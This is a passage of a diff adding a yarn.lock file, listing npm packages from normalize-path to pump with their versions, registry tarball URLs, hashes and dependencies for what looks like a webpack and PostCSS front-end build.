+  resolved "https://registry.yarnpkg.com/normalize-path/-/normalize-path-2.1.1.tgz#1ab28b556e198363a8c1a6f7e6fa20137fe6aed9"
+  dependencies:
+    remove-trailing-separator "^1.0.1"
+
+normalize-range@^0.1.2:
+  version "0.1.2"
+  resolved "https://registry.yarnpkg.com/normalize-range/-/normalize-range-0.1.2.tgz#2d10c06bdfd312ea9777695a4d28439456b75942"
+
+normalize-url@^1.4.0:
+  version "1.9.1"
+  resolved "https://registry.yarnpkg.com/normalize-url/-/normalize-url-1.9.1.tgz#2cc0d66b31ea23036458436e3620d85954c66c3c"
+  dependencies:
+    object-assign "^4.0.1"
+    prepend-http "^1.0.0"
+    query-string "^4.1.0"
+    sort-keys "^1.0.0"
+
+npm-bundled@^1.0.1:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/npm-bundled/-/npm-bundled-1.0.3.tgz#7e71703d973af3370a9591bafe3a63aca0be2308"
+
+npm-packlist@^1.1.6:
+  version "1.1.10"
+  resolved "https://registry.yarnpkg.com/npm-packlist/-/npm-packlist-1.1.10.tgz#1039db9e985727e464df066f4cf0ab6ef85c398a"
+  dependencies:
+    ignore-walk "^3.0.1"
+    npm-bundled "^1.0.1"
+
+npm-run-path@^2.0.0:
+  version "2.0.2"
+  resolved "https://registry.yarnpkg.com/npm-run-path/-/npm-run-path-2.0.2.tgz#35a9232dfa35d7067b4cb2ddf2357b1871536c5f"
+  dependencies:
+    path-key "^2.0.0"
+
+npmlog@^4.0.2:
+  version "4.1.2"
+  resolved "https://registry.yarnpkg.com/npmlog/-/npmlog-4.1.2.tgz#08a7f2a8bf734604779a9efa4ad5cc717abb954b"
+  dependencies:
+    are-we-there-yet "~1.1.2"
+    console-control-strings "~1.1.0"
+    gauge "~2.7.3"
+    set-blocking "~2.0.0"
+
+nprogress@^0.2.0:
+  version "0.2.0"
+  resolved "https://registry.yarnpkg.com/nprogress/-/nprogress-0.2.0.tgz#cb8f34c53213d895723fcbab907e9422adbcafb1"
+
+nth-check@~1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/nth-check/-/nth-check-1.0.1.tgz#9929acdf628fc2c41098deab82ac580cf149aae4"
+  dependencies:
+    boolbase "~1.0.0"
+
+num2fraction@^1.2.2:
+  version "1.2.2"
+  resolved "https://registry.yarnpkg.com/num2fraction/-/num2fraction-1.2.2.tgz#6f682b6a027a4e9ddfa4564cd2589d1d4e669ede"
+
+number-is-nan@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/number-is-nan/-/number-is-nan-1.0.1.tgz#097b602b53422a522c1afb8790318336941a011d"
+
+object-assign@^4.0.1, object-assign@^4.1.0, object-assign@^4.1.1:
+  version "4.1.1"
+  resolved "https://registry.yarnpkg.com/object-assign/-/object-assign-4.1.1.tgz#2109adc7965887cfc05cbbd442cac8bfbb360863"
+
+object-copy@^0.1.0:
+  version "0.1.0"
+  resolved "https://registry.yarnpkg.com/object-copy/-/object-copy-0.1.0.tgz#7e7d858b781bd7c991a41ba975ed3812754e998c"
+  dependencies:
+    copy-descriptor "^0.1.0"
+    define-property "^0.2.5"
+    kind-of "^3.0.3"
+
+object-keys@^1.0.11, object-keys@^1.0.8, object-keys@~1.0.0:
+  version "1.0.12"
+  resolved "https://registry.yarnpkg.com/object-keys/-/object-keys-1.0.12.tgz#09c53855377575310cca62f55bb334abff7b3ed2"
+
+object-visit@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/object-visit/-/object-visit-1.0.1.tgz#f79c4493af0c5377b59fe39d395e41042dd045bb"
+  dependencies:
+    isobject "^3.0.0"
+
+object.assign@^4.1.0:
+  version "4.1.0"
+  resolved "https://registry.yarnpkg.com/object.assign/-/object.assign-4.1.0.tgz#968bf1100d7956bb3ca086f006f846b3bc4008da"
+  dependencies:
+    define-properties "^1.1.2"
+    function-bind "^1.1.1"
+    has-symbols "^1.0.0"
+    object-keys "^1.0.11"
+
+object.getownpropertydescriptors@^2.0.3:
+  version "2.0.3"
+  resolved "https://registry.yarnpkg.com/object.getownpropertydescriptors/-/object.getownpropertydescriptors-2.0.3.tgz#8758c846f5b407adab0f236e0986f14b051caa16"
+  dependencies:
+    define-properties "^1.1.2"
+    es-abstract "^1.5.1"
+
+object.omit@^2.0.0:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/object.omit/-/object.omit-2.0.1.tgz#1a9c744829f39dbb858c76ca3579ae2a54ebd1fa"
+  dependencies:
+    for-own "^0.1.4"
+    is-extendable "^0.1.1"
+
+object.pick@^1.3.0:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/object.pick/-/object.pick-1.3.0.tgz#87a10ac4c1694bd2e1cbf53591a66141fb5dd747"
+  dependencies:
+    isobject "^3.0.1"
+
+on-finished@^2.1.0:
+  version "2.3.0"
+  resolved "https://registry.yarnpkg.com/on-finished/-/on-finished-2.3.0.tgz#20f1336481b083cd75337992a16971aa2d906947"
+  dependencies:
+    ee-first "1.1.1"
+
+once@^1.3.0, once@^1.3.1, once@^1.4.0:
+  version "1.4.0"
+  resolved "https://registry.yarnpkg.com/once/-/once-1.4.0.tgz#583b1aa775961d4b113ac17d9c50baef9dd76bd1"
+  dependencies:
+    wrappy "1"
+
+onetime@^2.0.0:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/onetime/-/onetime-2.0.1.tgz#067428230fd67443b2794b22bba528b6867962d4"
+  dependencies:
+    mimic-fn "^1.0.0"
+
+only@0.0.2:
+  version "0.0.2"
+  resolved "https://registry.yarnpkg.com/only/-/only-0.0.2.tgz#2afde84d03e50b9a8edc444e30610a70295edfb4"
+
+opn@^5.1.0:
+  version "5.3.0"
+  resolved "https://registry.yarnpkg.com/opn/-/opn-5.3.0.tgz#64871565c863875f052cfdf53d3e3cb5adb53b1c"
+  dependencies:
+    is-wsl "^1.1.0"
+
+optimize-css-assets-webpack-plugin@^4.0.0:
+  version "4.0.2"
+  resolved "https://registry.yarnpkg.com/optimize-css-assets-webpack-plugin/-/optimize-css-assets-webpack-plugin-4.0.2.tgz#813d511d20fe5d9a605458441ed97074d79c1122"
+  dependencies:
+    cssnano "^3.10.0"
+    last-call-webpack-plugin "^3.0.0"
+
+os-browserify@^0.3.0:
+  version "0.3.0"
+  resolved "https://registry.yarnpkg.com/os-browserify/-/os-browserify-0.3.0.tgz#854373c7f5c2315914fc9bfc6bd8238fdda1ec27"
+
+os-homedir@^1.0.0, os-homedir@^1.0.1:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/os-homedir/-/os-homedir-1.0.2.tgz#ffbc4988336e0e833de0c168c7ef152121aa7fb3"
+
+os-tmpdir@^1.0.0:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/os-tmpdir/-/os-tmpdir-1.0.2.tgz#bbe67406c79aa85c5cfec766fe5734555dfa1274"
+
+osenv@^0.1.4:
+  version "0.1.5"
+  resolved "https://registry.yarnpkg.com/osenv/-/osenv-0.1.5.tgz#85cdfafaeb28e8677f416e287592b5f3f49ea410"
+  dependencies:
+    os-homedir "^1.0.0"
+    os-tmpdir "^1.0.0"
+
+p-finally@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/p-finally/-/p-finally-1.0.0.tgz#3fbcfb15b899a44123b34b6dcc18b724336a2cae"
+
+p-limit@^1.0.0, p-limit@^1.1.0:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/p-limit/-/p-limit-1.3.0.tgz#b86bd5f0c25690911c7590fcbfc2010d54b3ccb8"
+  dependencies:
+    p-try "^1.0.0"
+
+p-locate@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/p-locate/-/p-locate-2.0.0.tgz#20a0103b222a70c8fd39cc2e580680f3dde5ec43"
+  dependencies:
+    p-limit "^1.1.0"
+
+p-try@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/p-try/-/p-try-1.0.0.tgz#cbc79cdbaf8fd4228e13f621f2b1a237c1b207b3"
+
+package-json@^4.0.0:
+  version "4.0.1"
+  resolved "https://registry.yarnpkg.com/package-json/-/package-json-4.0.1.tgz#8869a0401253661c4c4ca3da6c2121ed555f5eed"
+  dependencies:
+    got "^6.7.1"
+    registry-auth-token "^3.0.1"
+    registry-url "^3.0.3"
+    semver "^5.1.0"
+
+pako@~1.0.5:
+  version "1.0.6"
+  resolved "https://registry.yarnpkg.com/pako/-/pako-1.0.6.tgz#0101211baa70c4bca4a0f63f2206e97b7dfaf258"
+
+parallel-transform@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/parallel-transform/-/parallel-transform-1.1.0.tgz#d410f065b05da23081fcd10f28854c29bda33b06"
+  dependencies:
+    cyclist "~0.2.2"
+    inherits "^2.0.3"
+    readable-stream "^2.1.5"
+
+param-case@2.1.x:
+  version "2.1.1"
+  resolved "https://registry.yarnpkg.com/param-case/-/param-case-2.1.1.tgz#df94fd8cf6531ecf75e6bef9a0858fbc72be2247"
+  dependencies:
+    no-case "^2.2.0"
+
+parse-asn1@^5.0.0:
+  version "5.1.1"
+  resolved "https://registry.yarnpkg.com/parse-asn1/-/parse-asn1-5.1.1.tgz#f6bf293818332bd0dab54efb16087724745e6ca8"
+  dependencies:
+    asn1.js "^4.0.0"
+    browserify-aes "^1.0.0"
+    create-hash "^1.1.0"
+    evp_bytestokey "^1.0.0"
+    pbkdf2 "^3.0.3"
+
+parse-glob@^3.0.4:
+  version "3.0.4"
+  resolved "https://registry.yarnpkg.com/parse-glob/-/parse-glob-3.0.4.tgz#b2c376cfb11f35513badd173ef0bb6e3a388391c"
+  dependencies:
+    glob-base "^0.3.0"
+    is-dotfile "^1.0.0"
+    is-extglob "^1.0.0"
+    is-glob "^2.0.0"
+
+parse-json@^2.2.0:
+  version "2.2.0"
+  resolved "https://registry.yarnpkg.com/parse-json/-/parse-json-2.2.0.tgz#f480f40434ef80741f8469099f8dea18f55a4dc9"
+  dependencies:
+    error-ex "^1.2.0"
+
+parse-json@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/parse-json/-/parse-json-4.0.0.tgz#be35f5425be1f7f6c747184f98a788cb99477ee0"
+  dependencies:
+    error-ex "^1.3.1"
+    json-parse-better-errors "^1.0.1"
+
+parseurl@^1.3.0:
+  version "1.3.2"
+  resolved "https://registry.yarnpkg.com/parseurl/-/parseurl-1.3.2.tgz#fc289d4ed8993119460c156253262cdc8de65bf3"
+
+pascalcase@^0.1.1:
+  version "0.1.1"
+  resolved "https://registry.yarnpkg.com/pascalcase/-/pascalcase-0.1.1.tgz#b363e55e8006ca6fe21784d2db22bd15d7917f14"
+
+path-browserify@0.0.0:
+  version "0.0.0"
+  resolved "https://registry.yarnpkg.com/path-browserify/-/path-browserify-0.0.0.tgz#a0b870729aae214005b7d5032ec2cbbb0fb4451a"
+
+path-dirname@^1.0.0:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/path-dirname/-/path-dirname-1.0.2.tgz#cc33d24d525e099a5388c0336c6e32b9160609e0"
+
+path-exists@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/path-exists/-/path-exists-3.0.0.tgz#ce0ebeaa5f78cb18925ea7d810d7b59b010fd515"
+
+path-is-absolute@1.0.1, path-is-absolute@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/path-is-absolute/-/path-is-absolute-1.0.1.tgz#174b9268735534ffbc7ace6bf53a5a9e1b5c5f5f"
+
+path-is-inside@^1.0.1:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/path-is-inside/-/path-is-inside-1.0.2.tgz#365417dede44430d1c11af61027facf074bdfc53"
+
+path-key@^2.0.0, path-key@^2.0.1:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/path-key/-/path-key-2.0.1.tgz#411cadb574c5a140d3a4b1910d40d80cc9f40b40"
+
+path-parse@^1.0.5:
+  version "1.0.5"
+  resolved "https://registry.yarnpkg.com/path-parse/-/path-parse-1.0.5.tgz#3c1adf871ea9cd6c9431b6ea2bd74a0ff055c4c1"
+
+path-type@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/path-type/-/path-type-3.0.0.tgz#cef31dc8e0a1a3bb0d105c0cd97cf3bf47f4e36f"
+  dependencies:
+    pify "^3.0.0"
+
+pbkdf2@^3.0.3:
+  version "3.0.16"
+  resolved "https://registry.yarnpkg.com/pbkdf2/-/pbkdf2-3.0.16.tgz#7404208ec6b01b62d85bf83853a8064f8d9c2a5c"
+  dependencies:
+    create-hash "^1.1.2"
+    create-hmac "^1.1.4"
+    ripemd160 "^2.0.1"
+    safe-buffer "^5.0.1"
+    sha.js "^2.4.8"
+
+pify@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/pify/-/pify-3.0.0.tgz#e5a4acd2c101fdf3d9a4d07f0dbc4db49dd28176"
+
+pkg-dir@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/pkg-dir/-/pkg-dir-2.0.0.tgz#f6d5d1109e19d63edf428e0bd57e12777615334b"
+  dependencies:
+    find-up "^2.1.0"
+
+portfinder@^1.0.13:
+  version "1.0.13"
+  resolved "https://registry.yarnpkg.com/portfinder/-/portfinder-1.0.13.tgz#bb32ecd87c27104ae6ee44b5a3ccbf0ebb1aede9"
+  dependencies:
+    async "^1.5.2"
+    debug "^2.2.0"
+    mkdirp "0.5.x"
+
+posix-character-classes@^0.1.0:
+  version "0.1.1"
+  resolved "https://registry.yarnpkg.com/posix-character-classes/-/posix-character-classes-0.1.1.tgz#01eac0fe3b5af71a2a6c02feabb8c1fef7e00eab"
+
+postcss-calc@^5.2.0:
+  version "5.3.1"
+  resolved "https://registry.yarnpkg.com/postcss-calc/-/postcss-calc-5.3.1.tgz#77bae7ca928ad85716e2fda42f261bf7c1d65b5e"
+  dependencies:
+    postcss "^5.0.2"
+    postcss-message-helpers "^2.0.0"
+    reduce-css-calc "^1.2.6"
+
+postcss-colormin@^2.1.8:
+  version "2.2.2"
+  resolved "https://registry.yarnpkg.com/postcss-colormin/-/postcss-colormin-2.2.2.tgz#6631417d5f0e909a3d7ec26b24c8a8d1e4f96e4b"
+  dependencies:
+    colormin "^1.0.5"
+    postcss "^5.0.13"
+    postcss-value-parser "^3.2.3"
+
+postcss-convert-values@^2.3.4:
+  version "2.6.1"
+  resolved "https://registry.yarnpkg.com/postcss-convert-values/-/postcss-convert-values-2.6.1.tgz#bbd8593c5c1fd2e3d1c322bb925dcae8dae4d62d"
+  dependencies:
+    postcss "^5.0.11"
+    postcss-value-parser "^3.1.2"
+
+postcss-discard-comments@^2.0.4:
+  version "2.0.4"
+  resolved "https://registry.yarnpkg.com/postcss-discard-comments/-/postcss-discard-comments-2.0.4.tgz#befe89fafd5b3dace5ccce51b76b81514be00e3d"
+  dependencies:
+    postcss "^5.0.14"
+
+postcss-discard-duplicates@^2.0.1:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/postcss-discard-duplicates/-/postcss-discard-duplicates-2.1.0.tgz#b9abf27b88ac188158a5eb12abcae20263b91932"
+  dependencies:
+    postcss "^5.0.4"
+
+postcss-discard-empty@^2.0.1:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/postcss-discard-empty/-/postcss-discard-empty-2.1.0.tgz#d2b4bd9d5ced5ebd8dcade7640c7d7cd7f4f92b5"
+  dependencies:
+    postcss "^5.0.14"
+
+postcss-discard-overridden@^0.1.1:
+  version "0.1.1"
+  resolved "https://registry.yarnpkg.com/postcss-discard-overridden/-/postcss-discard-overridden-0.1.1.tgz#8b1eaf554f686fb288cd874c55667b0aa3668d58"
+  dependencies:
+    postcss "^5.0.16"
+
+postcss-discard-unused@^2.2.1:
+  version "2.2.3"
+  resolved "https://registry.yarnpkg.com/postcss-discard-unused/-/postcss-discard-unused-2.2.3.tgz#bce30b2cc591ffc634322b5fb3464b6d934f4433"
+  dependencies:
+    postcss "^5.0.14"
+    uniqs "^2.0.0"
+
+postcss-filter-plugins@^2.0.0:
+  version "2.0.3"
+  resolved "https://registry.yarnpkg.com/postcss-filter-plugins/-/postcss-filter-plugins-2.0.3.tgz#82245fdf82337041645e477114d8e593aa18b8ec"
+  dependencies:
+    postcss "^5.0.4"
+
+postcss-load-config@^1.2.0:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/postcss-load-config/-/postcss-load-config-1.2.0.tgz#539e9afc9ddc8620121ebf9d8c3673e0ce50d28a"
+  dependencies:
+    cosmiconfig "^2.1.0"
+    object-assign "^4.1.0"
+    postcss-load-options "^1.2.0"
+    postcss-load-plugins "^2.3.0"
+
+postcss-load-options@^1.2.0:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/postcss-load-options/-/postcss-load-options-1.2.0.tgz#b098b1559ddac2df04bc0bb375f99a5cfe2b6d8c"
+  dependencies:
+    cosmiconfig "^2.1.0"
+    object-assign "^4.1.0"
+
+postcss-load-plugins@^2.3.0:
+  version "2.3.0"
+  resolved "https://registry.yarnpkg.com/postcss-load-plugins/-/postcss-load-plugins-2.3.0.tgz#745768116599aca2f009fad426b00175049d8d92"
+  dependencies:
+    cosmiconfig "^2.1.1"
+    object-assign "^4.1.0"
+
+postcss-loader@^2.1.5:
+  version "2.1.5"
+  resolved "https://registry.yarnpkg.com/postcss-loader/-/postcss-loader-2.1.5.tgz#3c6336ee641c8f95138172533ae461a83595e788"
+  dependencies:
+    loader-utils "^1.1.0"
+    postcss "^6.0.0"
+    postcss-load-config "^1.2.0"
+    schema-utils "^0.4.0"
+
+postcss-merge-idents@^2.1.5:
+  version "2.1.7"
+  resolved "https://registry.yarnpkg.com/postcss-merge-idents/-/postcss-merge-idents-2.1.7.tgz#4c5530313c08e1d5b3bbf3d2bbc747e278eea270"
+  dependencies:
+    has "^1.0.1"
+    postcss "^5.0.10"
+    postcss-value-parser "^3.1.1"
+
+postcss-merge-longhand@^2.0.1:
+  version "2.0.2"
+  resolved "https://registry.yarnpkg.com/postcss-merge-longhand/-/postcss-merge-longhand-2.0.2.tgz#23d90cd127b0a77994915332739034a1a4f3d658"
+  dependencies:
+    postcss "^5.0.4"
+
+postcss-merge-rules@^2.0.3:
+  version "2.1.2"
+  resolved "https://registry.yarnpkg.com/postcss-merge-rules/-/postcss-merge-rules-2.1.2.tgz#d1df5dfaa7b1acc3be553f0e9e10e87c61b5f721"
+  dependencies:
+    browserslist "^1.5.2"
+    caniuse-api "^1.5.2"
+    postcss "^5.0.4"
+    postcss-selector-parser "^2.2.2"
+    vendors "^1.0.0"
+
+postcss-message-helpers@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/postcss-message-helpers/-/postcss-message-helpers-2.0.0.tgz#a4f2f4fab6e4fe002f0aed000478cdf52f9ba60e"
+
+postcss-minify-font-values@^1.0.2:
+  version "1.0.5"
+  resolved "https://registry.yarnpkg.com/postcss-minify-font-values/-/postcss-minify-font-values-1.0.5.tgz#4b58edb56641eba7c8474ab3526cafd7bbdecb69"
+  dependencies:
+    object-assign "^4.0.1"
+    postcss "^5.0.4"
+    postcss-value-parser "^3.0.2"
+
+postcss-minify-gradients@^1.0.1:
+  version "1.0.5"
+  resolved "https://registry.yarnpkg.com/postcss-minify-gradients/-/postcss-minify-gradients-1.0.5.tgz#5dbda11373703f83cfb4a3ea3881d8d75ff5e6e1"
+  dependencies:
+    postcss "^5.0.12"
+    postcss-value-parser "^3.3.0"
+
+postcss-minify-params@^1.0.4:
+  version "1.2.2"
+  resolved "https://registry.yarnpkg.com/postcss-minify-params/-/postcss-minify-params-1.2.2.tgz#ad2ce071373b943b3d930a3fa59a358c28d6f1f3"
+  dependencies:
+    alphanum-sort "^1.0.1"
+    postcss "^5.0.2"
+    postcss-value-parser "^3.0.2"
+    uniqs "^2.0.0"
+
+postcss-minify-selectors@^2.0.4:
+  version "2.1.1"
+  resolved "https://registry.yarnpkg.com/postcss-minify-selectors/-/postcss-minify-selectors-2.1.1.tgz#b2c6a98c0072cf91b932d1a496508114311735bf"
+  dependencies:
+    alphanum-sort "^1.0.2"
+    has "^1.0.1"
+    postcss "^5.0.14"
+    postcss-selector-parser "^2.0.0"
+
+postcss-modules-extract-imports@^1.2.0:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/postcss-modules-extract-imports/-/postcss-modules-extract-imports-1.2.0.tgz#66140ecece38ef06bf0d3e355d69bf59d141ea85"
+  dependencies:
+    postcss "^6.0.1"
+
+postcss-modules-local-by-default@^1.2.0:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/postcss-modules-local-by-default/-/postcss-modules-local-by-default-1.2.0.tgz#f7d80c398c5a393fa7964466bd19500a7d61c069"
+  dependencies:
+    css-selector-tokenizer "^0.7.0"
+    postcss "^6.0.1"
+
+postcss-modules-scope@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/postcss-modules-scope/-/postcss-modules-scope-1.1.0.tgz#d6ea64994c79f97b62a72b426fbe6056a194bb90"
+  dependencies:
+    css-selector-tokenizer "^0.7.0"
+    postcss "^6.0.1"
+
+postcss-modules-values@^1.3.0:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/postcss-modules-values/-/postcss-modules-values-1.3.0.tgz#ecffa9d7e192518389f42ad0e83f72aec456ea20"
+  dependencies:
+    icss-replace-symbols "^1.1.0"
+    postcss "^6.0.1"
+
+postcss-normalize-charset@^1.1.0:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/postcss-normalize-charset/-/postcss-normalize-charset-1.1.1.tgz#ef9ee71212d7fe759c78ed162f61ed62b5cb93f1"
+  dependencies:
+    postcss "^5.0.5"
+
+postcss-normalize-url@^3.0.7:
+  version "3.0.8"
+  resolved "https://registry.yarnpkg.com/postcss-normalize-url/-/postcss-normalize-url-3.0.8.tgz#108f74b3f2fcdaf891a2ffa3ea4592279fc78222"
+  dependencies:
+    is-absolute-url "^2.0.0"
+    normalize-url "^1.4.0"
+    postcss "^5.0.14"
+    postcss-value-parser "^3.2.3"
+
+postcss-ordered-values@^2.1.0:
+  version "2.2.3"
+  resolved "https://registry.yarnpkg.com/postcss-ordered-values/-/postcss-ordered-values-2.2.3.tgz#eec6c2a67b6c412a8db2042e77fe8da43f95c11d"
+  dependencies:
+    postcss "^5.0.4"
+    postcss-value-parser "^3.0.1"
+
+postcss-reduce-idents@^2.2.2:
+  version "2.4.0"
+  resolved "https://registry.yarnpkg.com/postcss-reduce-idents/-/postcss-reduce-idents-2.4.0.tgz#c2c6d20cc958284f6abfbe63f7609bf409059ad3"
+  dependencies:
+    postcss "^5.0.4"
+    postcss-value-parser "^3.0.2"
+
+postcss-reduce-initial@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/postcss-reduce-initial/-/postcss-reduce-initial-1.0.1.tgz#68f80695f045d08263a879ad240df8dd64f644ea"
+  dependencies:
+    postcss "^5.0.4"
+
+postcss-reduce-transforms@^1.0.3:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/postcss-reduce-transforms/-/postcss-reduce-transforms-1.0.4.tgz#ff76f4d8212437b31c298a42d2e1444025771ae1"
+  dependencies:
+    has "^1.0.1"
+    postcss "^5.0.8"
+    postcss-value-parser "^3.0.1"
+
+postcss-selector-parser@^2.0.0, postcss-selector-parser@^2.2.2:
+  version "2.2.3"
+  resolved "https://registry.yarnpkg.com/postcss-selector-parser/-/postcss-selector-parser-2.2.3.tgz#f9437788606c3c9acee16ffe8d8b16297f27bb90"
+  dependencies:
+    flatten "^1.0.2"
+    indexes-of "^1.0.1"
+    uniq "^1.0.1"
+
+postcss-selector-parser@^3.1.1:
+  version "3.1.1"
+  resolved "https://registry.yarnpkg.com/postcss-selector-parser/-/postcss-selector-parser-3.1.1.tgz#4f875f4afb0c96573d5cf4d74011aee250a7e865"
+  dependencies:
+    dot-prop "^4.1.1"
+    indexes-of "^1.0.1"
+    uniq "^1.0.1"
+
+postcss-svgo@^2.1.1:
+  version "2.1.6"
+  resolved "https://registry.yarnpkg.com/postcss-svgo/-/postcss-svgo-2.1.6.tgz#b6df18aa613b666e133f08adb5219c2684ac108d"
+  dependencies:
+    is-svg "^2.0.0"
+    postcss "^5.0.14"
+    postcss-value-parser "^3.2.3"
+    svgo "^0.7.0"
+
+postcss-unique-selectors@^2.0.2:
+  version "2.0.2"
+  resolved "https://registry.yarnpkg.com/postcss-unique-selectors/-/postcss-unique-selectors-2.0.2.tgz#981d57d29ddcb33e7b1dfe1fd43b8649f933ca1d"
+  dependencies:
+    alphanum-sort "^1.0.1"
+    postcss "^5.0.4"
+    uniqs "^2.0.0"
+
+postcss-value-parser@^3.0.1, postcss-value-parser@^3.0.2, postcss-value-parser@^3.1.1, postcss-value-parser@^3.1.2, postcss-value-parser@^3.2.3, postcss-value-parser@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/postcss-value-parser/-/postcss-value-parser-3.3.0.tgz#87f38f9f18f774a4ab4c8a232f5c5ce8872a9d15"
+
+postcss-zindex@^2.0.1:
+  version "2.2.0"
+  resolved "https://registry.yarnpkg.com/postcss-zindex/-/postcss-zindex-2.2.0.tgz#d2109ddc055b91af67fc4cb3b025946639d2af22"
+  dependencies:
+    has "^1.0.1"
+    postcss "^5.0.4"
+    uniqs "^2.0.0"
+
+postcss@^5.0.10, postcss@^5.0.11, postcss@^5.0.12, postcss@^5.0.13, postcss@^5.0.14, postcss@^5.0.16, postcss@^5.0.2, postcss@^5.0.4, postcss@^5.0.5, postcss@^5.0.6, postcss@^5.0.8, postcss@^5.2.16:
+  version "5.2.18"
+  resolved "https://registry.yarnpkg.com/postcss/-/postcss-5.2.18.tgz#badfa1497d46244f6390f58b319830d9107853c5"
+  dependencies:
+    chalk "^1.1.3"
+    js-base64 "^2.1.9"
+    source-map "^0.5.6"
+    supports-color "^3.2.3"
+
+postcss@^6.0.0, postcss@^6.0.1, postcss@^6.0.20, postcss@^6.0.22:
+  version "6.0.23"
+  resolved "https://registry.yarnpkg.com/postcss/-/postcss-6.0.23.tgz#61c82cc328ac60e677645f979054eb98bc0e3324"
+  dependencies:
+    chalk "^2.4.1"
+    source-map "^0.6.1"
+    supports-color "^5.4.0"
+
+prepend-http@^1.0.0, prepend-http@^1.0.1:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/prepend-http/-/prepend-http-1.0.4.tgz#d4f4562b0ce3696e41ac52d0e002e57a635dc6dc"
+
+preserve@^0.2.0:
+  version "0.2.0"
+  resolved "https://registry.yarnpkg.com/preserve/-/preserve-0.2.0.tgz#815ed1f6ebc65926f865b310c0713bcb3315ce4b"
+
+prettier@^1.13.0:
+  version "1.13.5"
+  resolved "https://registry.yarnpkg.com/prettier/-/prettier-1.13.5.tgz#7ae2076998c8edce79d63834e9b7b09fead6bfd0"
+
+pretty-bytes@^4.0.2:
+  version "4.0.2"
+  resolved "https://registry.yarnpkg.com/pretty-bytes/-/pretty-bytes-4.0.2.tgz#b2bf82e7350d65c6c33aa95aaa5a4f6327f61cd9"
+
+pretty-error@^2.0.2:
+  version "2.1.1"
+  resolved "https://registry.yarnpkg.com/pretty-error/-/pretty-error-2.1.1.tgz#5f4f87c8f91e5ae3f3ba87ab4cf5e03b1a17f1a3"
+  dependencies:
+    renderkid "^2.0.1"
+    utila "~0.4"
+
+pretty-time@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/pretty-time/-/pretty-time-1.0.0.tgz#544784adecaa2cd7d045ff8a8f1d4791c8e06e23"
+  dependencies:
+    is-number "^5.0.0"
+    nanoseconds "^1.0.0"
+
+prismjs@^1.13.0:
+  version "1.15.0"
+  resolved "https://registry.yarnpkg.com/prismjs/-/prismjs-1.15.0.tgz#8801d332e472091ba8def94976c8877ad60398d9"
+  optionalDependencies:
+    clipboard "^2.0.0"
+
+private@^0.1.6:
+  version "0.1.8"
+  resolved "https://registry.yarnpkg.com/private/-/private-0.1.8.tgz#2381edb3689f7a53d653190060fcf822d2f368ff"
+
+process-nextick-args@~2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/process-nextick-args/-/process-nextick-args-2.0.0.tgz#a37d732f4271b4ab1ad070d35508e8290788ffaa"
+
+process@^0.11.10:
+  version "0.11.10"
+  resolved "https://registry.yarnpkg.com/process/-/process-0.11.10.tgz#7332300e840161bda3e69a1d1d91a7d4bc16f182"
+
+process@~0.5.1:
+  version "0.5.2"
+  resolved "https://registry.yarnpkg.com/process/-/process-0.5.2.tgz#1638d8a8e34c2f440a91db95ab9aeb677fc185cf"
+
+promise-inflight@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/promise-inflight/-/promise-inflight-1.0.1.tgz#98472870bf228132fcbdd868129bad12c3c029e3"
+
+prr@~1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/prr/-/prr-1.0.1.tgz#d3fc114ba06995a45ec6893f484ceb1d78f5f476"
+
+pseudomap@^1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/pseudomap/-/pseudomap-1.0.2.tgz#f052a28da70e618917ef0a8ac34c1ae5a68286b3"
+
+public-encrypt@^4.0.0:
+  version "4.0.2"
+  resolved "https://registry.yarnpkg.com/public-encrypt/-/public-encrypt-4.0.2.tgz#46eb9107206bf73489f8b85b69d91334c6610994"
+  dependencies:
+    bn.js "^4.1.0"
+    browserify-rsa "^4.0.0"
+    create-hash "^1.1.0"
+    parse-asn1 "^5.0.0"
+    randombytes "^2.0.1"
+
+pump@^2.0.0, pump@^2.0.1:
+  version "2.0.1"
